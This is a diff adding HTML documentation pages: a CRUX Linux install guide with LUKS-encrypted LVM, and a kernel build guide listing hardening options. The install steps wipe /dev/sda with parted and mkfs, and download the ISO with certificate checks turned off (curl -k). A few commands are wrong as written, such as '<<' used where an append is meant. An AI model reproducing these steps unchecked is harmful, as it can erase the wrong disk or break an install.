+        more notes before downloading iso. Script
+        <a href="scripts/setup-iso.sh">setup-iso.sh</a> downloads
+        iso from master repo and checks md5sum.</p>
+
+        <pre>
+        $ curl -k -O https://serverop.de/crux/crux-3.5/iso/crux-3.5.iso
+        $ curl -k -O https://serverop.de/crux/crux-3.5/iso/crux-3.5.md5
+        $ md5sum crux-3.5.iso
+        eb0c9b75322ba240f229ec9834feddfd crux-3.5.iso
+        </pre>
+
+        <h2 id="step2">1.1.2. Prepare target</h2>
+
+        <p>Prepare disk or target location where new system will
+        be installed. Following steps describe how to create efi
+        system or msdos. Systems with bios_boot(msdos) only require
+        boot partition in the beginning of the disk, use ext4 file
+        system. For more information about gpt partitions table read
+        <a href="http://devil-detail.blogspot.com/2013/07/install-grub2-on-gpt-disk-dedicated-partition.html">devil-detail grub2 on gpt</a>. Script <a href="scripts/setup-target.sh">setup-target.sh</a> help to create partitions
+        scripts.</p>
+
+        <p>Load dm-crypt module and start parted;</p>
+
+        <pre>
+        # modprobe dm-crypt
+        # parted /dev/sda
+        </pre>
+
+        <p>Set unit size to use;</p>
+
+        <pre>
+        (parted) unit mib
+        </pre>
+
+        <h3>bios_boot</h3>
+
+        <p>If the system don't support efi, on bios_boot systems;</p>
+
+        <pre>
+        (parted) mklabel msdos
+        </pre>
+
+        <p>Boot partition. Partition with 1G provide room for kernels
+        and bootable iso's that can be directly boot from grub (without root
+        partition). Partition size ~1G;</p>
+
+        <pre>
+        (parted) mkpart primary ext4 2 1132
+        (parted) set 1 boot on
+        </pre>
+
+        <h3>efi/esp</h3>
+
+        <p>On systems that support efi;</p>
+
+        <pre>
+        (parted) mklabel gpt
+        </pre>
+
+        <p>Partition used by grub boot loader. Partition size 2M;</p>
+
+        <pre>
+        mkpart primary 2 4
+        name 1 grub
+        set 1 bios_grub on
+        </pre>
+
+        <p>EFI System Partition, ESP type EF00. Partition
+        with between 500M and 100M is recommended for standard
+        installations. Partition size 128M;</p>
+
+        <pre>
+        (parted) mkpart ESP fat32 4 132
+        (parted) name 2 efi
+        (parted) set 2 boot on
+        </pre>
+
+        <p>Boot partition. Partition with 1G provide room for kernels
+        and bootable iso's that can be directly boot from grub (without root
+        partition). Partition size ~1G;</p>
+
+        <pre>
+        (parted) mkpart primary ext4 132 1132
+        (parted) name 3 boot
+        </pre>
+
+        <h3>Encrypted lvm</h3>
+
+        <p>There are different ways to achieve disk encryption,
+        the method described uses cryptosetup to create cryptodevice
+        with <a href="../tools/lvm.html">lvm</a> inside containing
+        root and other partitions such as;
+        var, usr, swap and home.
+
+        <pre>
+        (parted) mkpart primary 1132 100%
+        </pre>
+
+        <p>Create encrypted block for lvm, partition layout of efi and bios boot systems is different.</p>
+
+        <p>On bios_boot systems partition should be  2 (sda4);</p>
+
+        <pre>
+        (parted) set 4 lvm on
+        # cryptsetup luksFormat /dev/sda4
+        # cryptsetup luksOpen /dev/sda4 cryptlvm
+        </pre>
+
+        <p>Create physical group and volume group;</p>
+
+        <pre>
+        # pvcreate /dev/mapper/cryptlvm
+        # vgcreate vg_system /dev/mapper/cryptlvm
+        </pre>
+
+        <h3>/ root partition</h3>
+
+        <p>Core collection installation on root partition uses
+        approximately 2G. Partition with 8G-20G is recommended
+        for a server or desktop with dedicated ports partition
+        or using only compiled packages. Partition size 20G;</p>
+
+
+        <pre>
+        # lvcreate -L 20G -n lv_root vg_system
+        </pre>
+
+        <h3>/var partition</h3>
+
+        <p>Var partition is recommended 1G-5G depending on how
+        system is configured. Partition size 2G;</p>
+
+        <pre>
+        # lvcreate -L 2G -n lv_var vg_system
+        </pre>
+
+        <h3>Swap (ram)</h3>
+
+        <p>Swap partition general advice is to have the same size as
+        memory ram, ports system will be configured to build on ram.
+        To build firefox is necessary at least 34G. Partition size 4G;</p>
+
+        <pre>
+        # lvcreate -L 4G -n lv_swap vg_system
+        </pre>
+
+
+        <h3>/home</h3>
+
+        <p>On desktop fill the rest of disk space while on server
+        this partition can be replaced with /srv.
+        Fill the rest of disk space;</p>
+
+        <pre>
+        # lvcreate -L 120G -n lv_home vg_system
+        </pre>
+
+        <h3>Create filesystems</h3>
+
+        <pre>
+        $ sudo mkfs.fat -F 32 /dev/sda2
+        $ sudo mkfs.ext4      /dev/sda3
+        $ sudo mkfs.ext4      /dev/vg_system/lv_root
+        $ sudo mkfs.ext4      /dev/vg_system/lv_var
+        $ sudo mkswap	      /dev/vg_system/lv_swap
+        $ sudo mkfs.ext4      /dev/vg_system/lv_home
+        </pre>
+
+        <h2 id="step3">1.1.3. Prepare Install</h2>
+
+        <p>From now on script
+        <a href="scripts/setup-target.sh">setup-target.sh</a>
+        create file systems, <a href="scripts/install-core.sh">install-core.sh</a> install core packages and
+        <a href="scripts/setup-core.sh">setup-core.sh</a>
+        configure host metadata and setup ports;</p>
+
+        <p>Export target root partition;</p>
+
+        <pre>
+        $ export BLK_ROOT=/dev/vg_system/lv_root
+        </pre>
+
+        <p>Export target root directory you want to install;</p>
+
+        <pre>
+        $ export CHROOT=/mnt
+        </pre>
+
+        <p>If you are installing to a directory and not partitions you don't need to mount;</p>
+
+        <pre>
+        $ sudo mount $BLK_ROOT $CHROOT
+        </pre>
+
+        <p>Create follow directories;</p>
+
+        <pre>
+        $ sudo mkdir -p $CHROOT/boot
+        $ sudo mkdir -p $CHROOT/var
+        $ sudo mkdir -p $CHROOT/usr
+        $ sudo mkdir -p $CHROOT/media
+        $ sudo mkdir -p $CHROOT/home
+
+        $ sudo mkdir -p $CHROOT/dev
+        $ sudo mkdir -p $CHROOT/tmp
+        $ sudo mkdir -p $CHROOT/proc
+        $ sudo mkdir -p $CHROOT/sys
+        </pre>
+
+        <p>If partition layout is different or target is a directory is not necessary to mount, create only the directories;</p>
+
+        <pre>
+        $ sudo mount $BLK_BOOT $CHROOT/boot
+        $ sudo mkdir -p $CHROOT/boot/efi
+        $ sudo mount $BLK_EFI $CHROOT/boot/efi
+
+        $ sudo mount $BLK_VAR $CHROOT/var
+        $ sudo mkdir -p $CHROOT/var/lib/pkg
+
+        $ sudo mount $BLK_HOME $CHROOT/home
+        </pre>
+
+        <p>Activate Chroot;</p>
+
+        <pre>
+        $ sudo mount --bind /dev $CHROOT/dev
+        $ sudo mount -vt devpts devpts $CHROOT/dev/pts
+        $ sudo mount -vt tmpfs shm $CHROOT/dev/shm
+        $ sudo mount -vt proc proc $CHROOT/proc
+        $ sudo mount -vt sysfs sysfs $CHROOT/sys
+        </pre>
+
+        <p>Mount iso or copy packages to target /mnt directory;</p>
+
+        <pre>
+        # modprobe isofs
+        # modprobe loop
+        # mount -o loop crux-3.5.iso $CHROOT/media
+        </pre>
+
+        <h2 id="step4">1.1.4. Install Crux</h2>
+
+        <p>Create file $CHROOT/core.lst containing
+        list of binary packages present in $CHROOT/media/crux/core/;</p>
+
+        <pre>
+        $ sudo for p in $CHROOT/media/crux/core/*; do echo $p &lt;&lt; $CHROOT/core.lst; done
+        </pre>
+
+        <p>Install temporary pkgadd on $CHROOT;</p>
+
+        <pre>
+        $ sudo tar xf /media/crux/core/pkgutils#5.40-1.pkg.tar.xz usr/bin/pkgadd -O > $CHROOT/pkgadd
+        $ sudo chmod +x $CHROOT/pkgadd
+        </pre>
+
+        <p>Edit $CHROOT/core.lst with your preferences, you can remove
+        or add packages from opt collection. Remove lilo if you want
+        grub.</p>
+
+        <p>Create package database, it will contain a list of
+        installed packages files.</p>
+
+        <pre>
+        $ sudo touch $CHROOT/var/lib/pkg/db
+        </pre>
+
+        <p>Install all packages listed in $CHROOT/core.lst;</p>
+
+        <pre>
+        $ su
+        # cd $CHROOT
+        while read line; do
+                printf "Installing $line;\n"
+                $CHROOT/pkgadd -f -r $CHROOT $line
+        done &lt; core.lst
+        </pre>
+
+        <h2 id="step5">1.1.5. Install extra packages</h2>
+
+        <p>Install additional ports like wireless-tools, grub2
+        and fakeroot;</p>
+
+        <pre>
+        cp $CHROOT/media/crux/opt/* $CHROOT/usr/ports/packages
+        cp $CHROOT/media/crux/xorg/* $CHROOT/usr/ports/packages
+        </pre>
+
+        <pre>
+        # chroot $CHROOT /bin/bash
+        </pre>
+
+        <pre>
+        pkgadd /usr/ports/packages/fakeroot#*
+        pkgadd /usr/ports/packages/dbus#*
+        pkgadd /usr/ports/packages/expat#*
+        pkgadd /usr/ports/packages/libnl#*
+        pkgadd /usr/ports/packages/libpng#*
+        pkgadd /usr/ports/packages/freetype#*
+        pkgadd /usr/ports/packages/libffi#*
+        pkgadd /usr/ports/packages/sqlite3#*
+        pkgadd /usr/ports/packages/python#*
+        pkgadd /usr/ports/packages/glib#*
+        pkgadd /usr/ports/packages/grub2#*
+        pkgadd /usr/ports/packages/grub2-efi#*
+        pkgadd /usr/ports/packages/wireless-tools#*
+        pkgadd /usr/ports/packages/wpa_supplicant#*
+        pkgadd /usr/ports/packages/lvm2#*
+        pkgadd /usr/ports/packages/mdadm#*
+        pkgadd /usr/ports/packages/efivar#*
+        pkgadd /usr/ports/packages/efibootmgr#*
+        pkgadd /usr/ports/packages/dosfstools#*
+        pkgadd /usr/ports/packages/ported#*
+        pkgadd /usr/ports/packages/libgcrypt#*
+        pkgadd /usr/ports/packages/cryptsetup#*
+        pkgadd /usr/ports/packages/popt#*
+        pkgadd /usr/ports/packages/libgpg-error#*
+        pkgadd /usr/ports/packages/libevent#*
+        pkgadd /usr/ports/packages/libtirpc#*
+        pkgadd /usr/ports/packages/git#*
+        pkgadd /usr/ports/packages/tmux#*
+        pkgadd /usr/ports/packages/prt-utils#*
+        pkgadd /usr/ports/packages/elfutils#*
+        </pre>
+
+        <pre>
+        # exit
+        </pre>
+
+        <pre>
+        $ sudo rm $CHROOT/pkgadd
+        $ sudo rm $CHROOT/core.lst
+        </pre>
+
+        <h2 id="step6">1.1.6. Install extra ports</h2>
+
+        <p>Create port collection;</p>
+
+        <pre>
+        $ sudo mkdir $CHROOT/usr/ports/machine-ports
+        </pre>
+
+        <p>Copy ports from  doc/core/ports;</p>
+
+        <pre>
+        $ sudo cp -r ports/* $CHROOT/usr/ports/machine-ports/
+        </pre>
+
+        <h2 id="step7">1.1.7. DNS Resolver</h2>
+
+        <pre>
+        $ sudo cp /etc/resolv.conf $CHROOT/etc
+        </pre>
+
+        <h2 id="step8">1.1.8. Install Handbook</h2>
+
+        <pre>
+        $ sudo cp $CHROOT/media/crux/handbook.txt $CHROOT/home/root/
+        </pre>
+
+        <h2 id="step9">1.1.9. Basic Skeleton</h2>
+
+        <p>Copy skeletons from  doc/core/conf;</p>
+
+        <pre>
+        $ sudo cp -R  conf/skel $CHROOT/etc/
+        </pre>
+
+        <a href="index.html">GNU/Linux Index</a>
+        <p>This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+
+    </body>
+</html>
diff --git a/linux/linux.html b/linux/linux.html
new file mode 100644
index 0000000..3d992e9
--- /dev/null
+++ b/linux/linux.html
@@ -0,0 +1,866 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>2.1. Kernel Linux</title>
+    </head>
+    <body>
+
+        <a href="index.html">GNU/Linux Index</a>
+
+        <h1 id="kernel">2.1. Kernel Linux</h1>
+
+        <p>Linux is a monolith kernel, a big one ! Visit
+        <a href="http://www.fsfla.org/ikiwiki/selibre/linux-libre/">Linux Libre</a>
+        and
+        <a href="https://www.kernel.org/">Linux Non-Libre</a> pages for more links
+        and information.</p>
+
+        <p>Spectre-meltdown checker;</p>
+        <pre>
+        https://github.com/speed47/spectre-meltdown-checker/
+        </pre>
+
+        <h2 id="download">2.1.1. Download Linux Libre</h2>
+
+        <p>Download Linux Source from
+        <a href="http://linux-libre.fsfla.org/pub/linux-libre/releases/">linux libre</a>,
+        or using the port system;</p>
+
+        <pre>
+        $ mkdir ~/kernel
+        $ cd ~/kernel
+        $ cd linux-4.9.86/
+        </pre>
+
+        <p>Gcc <a href="https://github.com/graysky2/kernel_gcc_patch/">graysky2</a> kernel_gcc_patch (<a href="https://github.com/graysky2/kernel_gcc_patch/archive/master.zip">master.zip</a>)
+        that adds more cpu options (FLAGS) for native builds.
+        Check <a href="ports/linux-gnu/Pkgfile">Pkgfile</a>
+        for instructions how linux-gnu port is built.</p>
+
+        <p>Check version on Makefile;</p>
+
+        <pre>
+        VERSION = 4
+        PATCHLEVEL = 9
+        SUBLEVEL = 86
+        EXTRAVERSION = -gnu
+        NAME = Roaring Lionus
+        </pre>
+
+        <p>Change cpu optimization patch;</p>
+
+        <pre>
+        depends on (MK8 || MK7 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MCRUSOE || MEFFICEON || X86_64 || MATOM || MGEODE_LX)
+        </pre>
+
+        <p>to;</p>
+
+        <pre>
+        depends on (MK8 || MK7 || MCORE2 || MPSC || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MCRUSOE || MEFFICEON || X86_64 || MATOM || MGEODE_LX)
+        </pre>
+
+        <p>Apply additional cpu optimizations patch;</p>
+
+        <pre>
+        $ patch -p1 &lt; ../enable_additional_cpu_optimizations_for_gcc_v4.9%2B_kernel_v3.15%2B.patch
+        </pre>
+
+        <p>Cleaning targets:</p>
+
+        <pre>
+        clean           - Remove most generated files but keep the config and
+                    enough build support to build external modules
+        mrproper        - Remove all generated files + config + various backup files
+        distclean       - mrproper + remove editor backup and patch files
+        </pre>
+
+        <p>Prepare sources for configuration;</p>
+
+        <pre>
+        $ make distclean
+        </pre>
+
+        <h2 id="configure">2.1.2. Configure</h2>
+
+        <p>Port linux-gnu port comes with default configuration file  that is
+        a good starting point to tune kernel according to your needs. To
+        automatically configure kernel with support to your hardware
+        based on modules loaded by current kernel run.</p>
+
+        <pre>
+        $ make localmodconfig
+        </pre>
+
+        <p>To get more information about the hardware, for example
+        information about which graphic module (driver) is in use
+        as root run;</p>
+
+        <pre>
+        # lspci -nnk | grep -i vga -A3 | grep 'in use'
+        Kernel driver in use: i915
+        </pre>
+
+        <p>Make configuration targets;</p>
+
+        <pre>
+        config          - Update current config utilising a line-oriented program
+        nconfig         - Update current config utilising a ncurses menu based program
+        menuconfig      - Update current config utilising a menu based program
+        xconfig         - Update current config utilising a Qt based front-end
+        gconfig         - Update current config utilising a GTK+ based front-end
+        oldconfig       - Update current config utilising a provided .config as base
+        localmodconfig  - Update current config disabling modules not loaded
+        localyesconfig  - Update current config converting local mods to core
+        silentoldconfig - Same as oldconfig, but quietly, additionally update deps
+        defconfig       - New config with default from ARCH supplied defconfig
+        savedefconfig   - Save current config as ./defconfig (minimal config)
+        allnoconfig     - New config where all options are answered with no
+        allyesconfig    - New config where all options are accepted with yes
+        allmodconfig    - New config selecting modules when possible
+        alldefconfig    - New config with all symbols set to default
+        randconfig      - New config with random answer to all options
+        listnewconfig   - List new options
+        olddefconfig    - Same as silentoldconfig but sets new symbols to their default value
+        kvmconfig       - Enable additional options for kvm guest kernel support
+        xenconfig       - Enable additional options for xen dom0 and guest kernel support
+        tinyconfig      - Configure the tiniest possible kernel
+        </pre>
+
+        <p>Following configuration try's to be generic about the hardware
+        support  while addressing the requirements of applications such as
+        qemu, docker, etc. For more information about hardening options read
+        <a href="https://kernsec.org">kernsec.org</a>. Configure kernel
+        using ncurses;</p>
+
+        <pre>
+        $ make nconfig
+        </pre>
+
+        <pre>
+            CONFIG_BUG_ON_DATA_CORRUPTION=y
+
+            # Perform extensive checks on reference counting.
+            CONFIG_REFCOUNT_FULL=y
+
+            # Check for memory copies that might overflow a structure in str*() and mem*() functions both at build-time and run-time.
+            CONFIG_FORTIFY_SOURCE=y
+
+        </pre>
+
+        <h3 id="general">2.1.2.1 General Setup</h3>
+        <dl>
+            <dt>CONFIG_POSIX_MQUEUE=y</dt>
+            <dd>POSIX Message Queues</dd>
+
+            <dt>CONFIG_VMAP_STACK=y</dt>
+            <dd>Use a virtually-mapped stack</dd>
+            <dd>Adds guard pages to kernel stacks (not all architectures
+            support this yet).</dd>
+
+            <dt>CONFIG_CGROUPS=y</dt>
+            <dd>Control Group support</dd>
+
+            <dt>CONFIG_MEMCG=y</dt>
+            <dd>Memory controller</dd>
+
+            <dt>CONFIG_MEMCG_SWAP=y</dt>
+            <dd>Swap controller</dd>
+
+            <dt>CONFIG_MEMCG_SWAP_ENABLED=y</dt>
+            <dd>Swap controller enabled by default</dd>
+
+            <dt>CONFIG_BLK_CGROUP=y</dt>
+            <dd>IO controller</dd>
+
+            <dt>CGROUP_SCHED=y</dt>
+            <dd>CPU controller</dd>
+
+            <dt>FAIR_GROUP_SCHED=y</dt>
+            <dd>Group scheduling for SCHED_OTHER</dd>
+
+            <dt>CONFIG_CFS_BANDWIDTH=y</dt>
+            <dd>CPU bandwidth provisioning for FAIR_GROUP_SCHED</dd>
+
+            <dt>CONFIG_RT_GROUP_SCHED=y</dt>
+            <dd>Group scheduling for SCHED_RR/FIFO</dd>
+
+            <dt>CONFIG_CGROUP_PIDS=y</dt>
+            <dd>PIDs controller</dd>
+
+            <dd>Freezer controller</dd>
+            <dd>HugeTLB controller</dd>
+            <dd>Cpuset controller</dd>
+            <dd>Include legacy /proc/<pid>/cpuset file</dd>
+            <dd>Device controller</dd>
+            <dd>Simple CPU accounting controller</dd>
+            <dd>Perf controller</dd>
+        </dl>
+
+        <h4>Namespaces support</h4>
+        <dl>
+            <dd>UTS namespace</dd>
+            <dd>IPC namespace</dd>
+            <dd>User namespace</dd>
+            <dd>PID Namespaces</dd>
+            <dd>Network namespace</dd>
+        </dl>
+
+        <dl>
+
+            <dt>CONFIG_COMPAT_BRK=n</dt>
+            <dd>Disable heap randomization</dd>
+            <dd>Dangerous; enabling this disables brk ASLR.</dd>
+
+            <dt>CONFIG_SLAB_FREELIST_RANDOM=y</dt>
+            <dd>Randomize allocator freelists, harden metadata.</dd>
+
+            <dt>CONFIG_SLAB_FREELIST_HARDENED=y</dt>
+            <dd>Randomize allocator freelists, harden metadata.</dd>
+
+            <dt>CONFIG_SLUB_DEBUG=y<dt>
+            <dd>Enable SLUB debugging support</dd>
+            <dd>Allow allocator validation checking to be enabled
+            (see "slub_debug=P" below).</dd>
+
+            <dt>CONFIG_CC_STACKPROTECTOR=y</dt>
+            <dd>Use -fstack-protector-strong (gcc 4.9+) for best stack canary coverage.</dd>
+
+            <dt>CONFIG_CC_STACKPROTECTOR_STRONG=y</dt>
+            <dd>Use -fstack-protector-strong (gcc 4.9+) for best stack canary coverage.</dd>
+        </dl>
+
+
+        <h3 id="mod">2.1.2.2 Enable loadable module support</h3>
+        <dl>
+
+            <dt>CONFIG_MODULES=y</dt>
+            <dd>Enable loadable module support
+            <dd>Keep root from altering kernel memory via loadable modules.
+            set CONFIG_MODULES=n</dd>
+            <dd>But if CONFIG_MODULE=y is needed, at least they must be
+            signed with a per-build key.<dd>
+
+            <dt>CONFIG_DEBUG_SET_MODULE_RONX=y</dt>
+            <dd>(prior to v4.11)</dd>
+
+            <dt>CONFIG_STRICT_MODULE_RWX=y</dt>
+            <dd>(since v4.11)</dd>
+
+            <dt>CONFIG_MODULE_SIG=y</dt>
+            <dd>Module signature verification</dd>
+
+            <dt>CONFIG_MODULE_SIG_FORCE=y</dt>
+            <dd>Require modules to be validly signed</dd>
+
+            <dt>CONFIG_MODULE_SIG_ALL=y</dt>
+            <dd>Automatically sign all modules</dd>
+
+            <dt>CONFIG_MODULE_SIG_SHA512=y</dt>
+            <dd>Sign modules with SHA-512</dd>
+        </dl>
+
+        <h3 id="block">2.1.2.3 Enable the block layer</h3>
+        <dl>
+            <dt>BLK_DEV_THROTTLING=y</dt>
+            <dd>Block layer bio throttling support</dd>
+
+            <dt>IOSCHED_CFQ=y</dt>
+            <dd>CFQ IO scheduler</dd>
+
+            <dt>CONFIG_CFQ_GROUP_IOSCHED=y</dt>
+            <dd>CFQ Group Scheduling support</dd>
+        </dl>
+
+        <h3 id="proc">2.1.2.4 Processor type and features</h3>
+
+        <dl>
+            <dt>CONFIG_DEFAULT_MMAP_MIN_ADDR=65536</dt>
+            <dd>Low address space to protect from user allocation</dd>
+            <dd>Disallow allocating the first 64k of memory.</dd>
+
+            <dt>X86_VSYSCALL_EMULATION=n</dt>
+            <dd>Enable vsyscall emulation</dd>
+            <dd>Required by programs before 2013, some programs my
+            require.</dd>
+            <dd>Remove additional attack surface, unless you really
+            need them.</dd>
+
+            <dt>CONFIG_SECCOMP=y</dt>
+            <dd>Enable seccomp to safely compute untrusted bytecode</dd>
+            <dd>Provide userspace with seccomp BPF API for syscall attack surface reduction.</dd>
+
+            <dt>CONFIG_SECCOMP_FILTER=y</dt>
+            <dd>Provide userspace with seccomp BPF API for syscall attack surface reduction.</dd>
+
+            <dt>CONFIG_KEXEC=n</dt>
+            <dd>kexec system call</dd>
+            <dd>Dangerous; enabling this allows replacement
+            of running kernel.</dd>
+
+            <dt>CONFIG_RANDOMIZE_BASE=y</dt>
+            <dd>Randomize the address of the kernel image (KASLR)</dd>
+
+            <dt>CONFIG_RANDOMIZE_MEMORY=y</dt>
+            <dd>Randomize the kernel memory sections</dd>
+
+            <dt>CONFIG_LEGACY_VSYSCALL_NONE=y</dt>
+            <dd>vsyscall table for legacy applications (None)</dd>
+            <dd>Modern libc no longer needs a fixed-position mapping in userspace, remove it as a possible target.</dd>
+
+            <dt>CONFIG_COMPAT_VDSO=n</dt>
+            <dd>Disable the 32-bit vDSO (needed for glibc 2.3.3)</dd>
+            <dd>Dangerous; enabling this disables VDSO ASLR.</dd>
+
+            <dt>CONFIG_MODIFY_LDT_SYSCALL=n</dt>
+            <dd>Enable the LDT (local descriptor table)</dd>
+            <dd>Remove additional attack surface, unless you really need them.</dd>
+        </dl>
+
+        <h3 id="acpi">2.1.2.5 Power management and ACPI options</h3>
+
+        <dl>
+            <dt>CONFIG_HIBERNATION=n</dt>
+            <dd>Hibernation (aka 'suspend to disk')</dd>
+            <dd>Dangerous; enabling this allows replacement of running
+            kernel.</dd>
+
+            <dt>CONFIG_ACPI_CUSTOM_METHOD=n</dt>
+            <dd>Allow ACPI methods to be inserted/replaced at run time</dd>
+            <dd>Dangerous; enabling this allows direct physical
+            memory writing.</dd>
+        </dl>
+
+
+        <h3 id="bus">2.1.2.6 Bus options (PCI etc.)</h3>
+        <h3 id="exec">2.1.2.7 Executable file formats / Emulations</h3>
+        <dl>
+
+            <dt>CONFIG_BINFMT_MISC=n</dt>
+            <dd>Kernel support for MISC binaries</dd>
+            <dd>Easily confused by misconfigured userspace, keep off.</dd>
+
+            <dt>CONFIG_IA32_EMULATION</dt>
+            <dd>Remove additional attack surface, unless you really need them.</dd>
+            <dt>CONFIG_X86_X32</dt>
+            <dd>Remove additional attack surface, unless you really need them.</dd>
+        </dl>
+
+        <h3 id="net">2.1.2.8 Networking support</h3>
+        <h4>Networking options</h4>
+        <dl>
+            <dt>CONFIG_INET_DIAG=m</dt>
+            <dd>INET: socket monitoring interface</dd>
+            <dd>Support for INET (TCP, DCCP, etc) socket monitoring
+            interface used by native Linux tools such as ss. ss is
+            included in iproute2</dd>
+            <dd>Prior to v4.1, assists heap memory attacks;
+            best to keep interface disabled.</dd>
+
+            <dt>CONFIG_BRIDGE=y</dt>
+            <dd>802.1d Ethernet Bridging</dd>
+
+            <dt>CONFIG_NET_SCHED=y</dt>
+            <dd>QoS and/or fair queueing</dd>
+
+            <dt>CONFIG_NET_CLS_CGROUP=y</dt>
+            <dd>Control Group Classifier</dd>
+
+            <dt>CONFIG_VSOCKETS=y</dt>
+            <dd>Virtual Socket protocol</dd>
+
+            <dt>CONFIG_VIRTIO_VSOCKETS=y<dt>
+            <dd>virtio transport for Virtual Sockets</dd>
+
+            <dt>CONFIG_NET_L3_MASTER_DEV=y</dt>
+            <dd>L3 Master device support</dd>
+
+            <dt>CONFIG_CGROUP_NET_PRIO=y</dt>
+            <dd>Network priority cgroup</dd>
+
+            <dt>CGROUP_NET_CLASSID=y</dt>
+            <dd>Network classid cgroup</dd>
+
+        </dl>
+
+        <dl>
+            <dt>CONFIG_NETFILTER=y</dt>
+            <dd>Network packet filtering framework (Netfilter)</dd>
+
+            <dt>CONFIG_NETFILTER_ADVANCED=y</dt>
+            <dd>Advanced netfilter configuration</dd>
+
+            <dt>BRIDGE_NETFILTER=y</dt>
+            <dd>Bridged IP/ARP packets filtering</dd>
+
+            <dt>NF_CONNTRACK=y</dt>
+            <dd>Netfilter connection tracking support</dd>
+
+            <dt>NETFILTER_XT_MATCH_ADDRTYPE=y</dt>
+            <dd>"addrtype" address type match support</dd>
+
+            <dt>NETFILTER_XT_MATCH_CONNTRACK=y</dt>
+            <dd>"conntrack" connection tracking match support</dd>
+
+            <dt>CONFIG_NETFILTER_XT_MATCH_IPVS=y</dt>
+            <dd>"ipvs" match support</dd>
+
+            <dt>CONFIG_IP_VS=y</dt>
+            <dd>IP virtual server support</dd>
+
+            <dt>IP_VS_PROTO_TCP=y</dt>
+            <dd>TCP load balancing support</dd>
+
+            <dt>IP_VS_PROTO_UDP=y</dt>
+            <dd>UDP load balancing support</dd>
+
+            <dt>IP_VS_RR=y</dt>
+            <dd>round-robin scheduling</dd>
+
+            <dt>IP_VS_NFCT=y</dt>
+            <dd>Netfilter connection tracking</dd>
+
+            <dt>CONFIG_NF_CONNTRACK_IPV4=y</dt>
+            <dd>IPv4 connection tracking support (required for NAT)</dd>
+
+            <dt>NF_NAT_IPV4=y</dt>
+            <dd>IPv4 NAT</dd>
+
+            <dt>NF_NAT_MASQUERADE_IPV4=y</dt>
+            <dd>IPv4 masquerade support</dd>
+
+            <dt>IP_NF_IPTABLES=y</dt>
+            <dd>IP tables support (required for filtering/masq/NAT)</dd>
+
+            <dt>IP_NF_FILTER=y</dt>
+            <dd>Packet filtering</dd>
+
+            <dt>CONFIG_IP_NF_NAT=y</dt>
+            <dd>iptables NAT support</dd>
+
+            <dt>IP_NF_TARGET_MASQUERADE=y</dt>
+            <dd>MASQUERADE target support</dd>
+
+            <dt>IP_NF_TARGET_NETMAP=y</dt>
+            <dd>NETMAP target support</dd>
+
+            <dt>IP_NF_TARGET_REDIRECT=y</dt>
+            <dd>REDIRECT target support</dd>
+
+            <dt>CONFIG_SYN_COOKIES=y</dt>
+            <dd>IP: TCP syncookie support</dd>
+            <dd>Provides some protections against SYN flooding.</dd>
+
+        </dl>
+
+        <h3 id="drivers">2.1.2.9 Device Drivers</h3>
+
+        <h4>Block devices</h4>
+        <dl>
+            <dt>CONFIG_VIRTIO_BLK=y</dt>
+            <dd>This is the virtual block driver for virtio.</dd>
+            <dd>For QEMU based VMMs.</dd>
+            <dt>BLK_DEV_NBD=y</dt>
+            <dd>Network block device support.</dd>
+        </dl>
+
+        <h4>SCSI device support</h4>
+        <dl>
+            <dt>CONFIG_SCSI_VIRTIO=y</dt>
+            <dd>This is the virtual HBA driver for virtio.
+            If the kernel will used in a virtual machine.</dd>
+        </dl>
+
+        <h4>Multiple devices driver support (RAID and LVM)</h4>
+
+        <dl>
+            <dt>CONFIG_MD=y</dt>
+            <dd>Multiple devices driver support (RAID and LVM)</dd>
+            <dt>CONFIG_BLK_DEV_DM=y</dt>
+            <dd>Device mapper support</dd>
+            <dt>DM_THIN_PROVISIONING=y</dt>
+            <dd>Thin provisioning target<dd>
+        </dl>
+
+        <h4>Network device support</h4>
+
+        <dl>
+            <dt>CONFIG_NETDEVICES=y</dt>
+            <dd>Network device support</dd>
+
+            <dt>NET_CORE=y</dt>
+            <dd>Network core driver support</dd>
+
+            <dt>CONFIG_DUMMY=y</dt>
+            <dd>Dummy net driver support</dd>
+
+            <dt>CONFIG_MACVLAN=y</dt>
+            <dd>MAC-VLAN support</dd>
+            <dd>This allows one to create virtual interfaces that map
+            packets to or from specific MAC addresses to a particular
+            interface. Macvlan devices can be added using the "ip" command
+            from the route2 package starting with the iproute2.</dd>
+            <dd>ip link add link <real dev> [ address MAC ] [ NAME ] type macvlan"</dd>
+
+            <dt>CONFIG_VXLAN=y</dt>
+            <dd>Virtual eXtensible Local Area Network (VXLAN)</dd>
+            <dt>BLK_DEV_NBD=y</dt>
+            <dd>Network block device support.</dd>
+
+            <dt>CONFIG_TUN=y</dt>
+            <dd>Universal TUN/TAP device driver support</dd>
+
+            <dt>CONFIG_VETH=y</dt>
+            <dd>Virtual ethernet pair device.</dd>
+
+            <dt>CONFIG_VIRTIO_NET=y</dt>
+            <dd>Virtio network driver.</dd>
+
+            <dt>IPVLAN=n</dt>
+            <dd>IP-VLAN support</dd>
+            <dd>Requires ipv6</dd>
+        </dl>
+
+        <h4>Character devices</h4>
+        <dl>
+            <dt>CONFIG_DEVMEM=n</dt>
+            <dd>/dev/mem virtual device support</dd>
+            <dd>Do not allow direct physical memory access (but if you must have it, at least enable CONFIG_STRICT_DEVMEM mode...)</dd>
+
+            <dd>Enable TTY</dd>
+            <dd>Unix98 PTY support</dd>
+
+            <dt>CONFIG_LEGACY_PTYS=n</dt>
+            <dd>Legacy (BSD) PTY support</dd>
+            <dd>Use the modern PTY interface (devpts) only.</dd>
+
+            <dd>Support multiple instances of devpts</dd>
+
+            <dt>CONFIG_DEVKMEM=n</dt>
+            <dd>/dev/kmem virtual device support</dd>
+            <dd>Dangerous; enabling this allows direct kernel
+            memory writing.</dd>
+        </dl>
+
+        <h4>Virtio drivers</h4>
+        <dl>
+            <dt>CONFIG_VIRTIO_PCI=y</dt>
+            <dd>PCI driver for virtio devices</dd>
+        </dl>
+
+        <h3 id="firm">2.1.2.10 Firmware Drivers</h3>
+        <h3 id="fs">2.1.2.11 File systems</h3>
+        <dl>
